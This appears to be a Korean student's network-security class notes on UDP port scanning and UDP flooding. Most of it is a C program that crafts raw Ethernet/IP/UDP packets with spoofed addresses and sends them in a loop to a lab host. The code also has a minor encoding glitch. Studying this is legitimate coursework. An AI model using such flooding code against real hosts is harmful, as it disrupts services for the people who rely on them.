2016. 5. 12. 16:39ㆍ네트워크 보안 수업/네트워크 취약점 분석
UDP Scanning
- 정보수집
- PORT Scanning
* 닫힌 포트에 대한 스캐닝
- UDP 패킷을 작성해서 전송
- 열린 포트에 대해서는 반응을 하지 않는다.
- 닫힌 포트는 icmp error(port unreachable)로 응답
UDP Flooding(DDOS)
- 네트워크 트래픽을 대상으로 하는 공격 기법
- 해당 네트워크의 성능을 떨어뜨리는 방법
* DOS(Denial Of Service)
- 서버 과부하(대량의 패킷)
- 서버 다운
* DDOS(Distribute DOS)
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/ip.h>
#include <net/if.h>
#include <net/if_arp.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>
#include <net/ethernet.h>
#include <arpa/inet.h>
struct eth_header {
unsigned char dst[6];
unsigned char src[6];
unsigned short type;
} __attribute__((packed));
struct ip_header{
unsigned char hlen:4;
unsigned char ver:4;
unsigned char service;
unsigned short total;
unsigned short id;
unsigned char flag;
unsigned char offset;
unsigned char ttl;
unsigned char type;
unsigned short chk;
unsigned int src;
unsigned int dst;
} __attribute__((packed));
struct udp_header {
unsigned short src_port;
unsigned short dst_port;
unsigned short length;
unsigned short chksum;
unsigned char data[10];
} __attribute__((packed));
struct pseudo_header {
unsigned long int src;
unsigned long int dst;
unsigned char zero;
unsigned char protocol;
unsigned short length;
struct udp_header udp;
} __attribute__((packed));
unsigned short csum ( unsigned short *buf, int nwords )
{
unsigned long sum;
u_short oddbyte;
register u_short answer;
sum = 0;
while( nwords > 1 ) {
sum += *buf++;
nwords -= 2;
}
if( nwords ==1 ) {
oddbyte = 0;
*((u_char *)&oddbyte) = *(u_char *)buf;
sum += oddbyte;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return (answer);
}
int main(int argc, char *argv[])
{
int sock = 0;
struct sockaddr_ll sll;
struct eth_header eth;
struct ip_header ip;
struct udp_header udp;
struct pseudo_header pseudo;
char data[sizeof( eth ) + sizeof( ip ) + sizeof( udp )] = {0,};
//create socket
sock = socket(PF_PACKET, SOCK_RAW, 0);
//socket struct
sll.sll_family = PF_PACKET;
sll.sll_ifindex = if_nametoindex("enp0s3");
sll.sll_halen = 6;
//ether header
//target mac address
eth.dst[0] = 0x50;
eth.dst[1] = 0x6a;
eth.dst[2] = 0x03;
eth.dst[3] = 0xaf;
eth.dst[4] = 0x2a;
eth.dst[5] = 0x98;
//src mac address
eth.src[0] = 0x90;
eth.src[1] = 0x9f;
eth.src[2] = 0x33;
eth.src[3] = 0xec;
eth.src[4] = 0xd6;
eth.src[5] = 0xe1;
//type
eth.type = htons(0x0800);
//ip header
//ver_len
ip.ver = 0x4;
ip.hlen = sizeof( ip ) >> 2;
//service
ip.service = 0x00;
//total
ip.total = htons( sizeof( ip ) + sizeof( udp ));
//id
ip.id = htons( 0x1234 );
//flag & offset
ip.flag = 0x00;
ip.offset = 0x00;
//ttl
ip.ttl = 0x80;
//type
ip.type = 0x11;
//chk
ip.chk = 0x00;
//src ip
ip.src = inet_addr("192.168.15.180");
//dst ip
ip.dst = inet_addr("192.168.15.150");
ip.chk = csum( (unsigned short *)&ip, sizeof( ip ) );
//udp header
//type
udp.src_port = htons(0xe9ed);
udp.dst_port = htons(80);
udp.length = htons(sizeof(udp));
memcpy(&udp.data, "aaaaaaaaaa", 10);
udp.chksum = 0x00;
pseudo.src = ip.src;
pseudo.dst = ip.dst;
pseudo.zero = 0;
pseudo.protocol = 0x11;
pseudo.length = htons(sizeof(udp));
memcpy( &pseudo.udp, &udp, sizeof(udp));
udp.chksum = csum((unsigned short *)&pseudo, sizeof(pseudo));
memcpy( data, ð, sizeof( eth ) );
memcpy( data + sizeof( eth ), &ip, sizeof( ip ) );
memcpy( data + sizeof( eth ) + sizeof( ip ), &udp, sizeof( udp ) );
int i = 0;
unsigned char *ptr = data;
for( i = 0; i < sizeof( data ); i++){
if( i != 0 && i % 16 ==0 ){ printf("\n"); }
printf("%02x ", *(ptr+i));
}
printf("\n");
//send
while(1){
sendto(sock, data, sizeof(data), 0, (struct sockaddr *)&sll, sizeof(sll));
sleep(1);
}
return 0;
}
'네트워크 보안 수업 > 네트워크 취약점 분석' 카테고리의 다른 글
| 네트워크 보안수업 14일차 - 코리아 정보보안 IT학원 (0) | 2016.05.18 |
|---|---|
| 네트워크 보안 수업 12일차 - 코리아 정보보안 IT학원 (0) | 2016.05.16 |
| 네트워크 보안 수업 10일차 - 코리아 정보보안 IT학원 (0) | 2016.05.11 |
| 네트워크 보안 수업 9일차 - 코리아 정보보안 IT학원 (0) | 2016.05.10 |
| 네트워크 보안 수업 8일차 - 코리아 정보보안 IT학원 (0) | 2016.05.09 |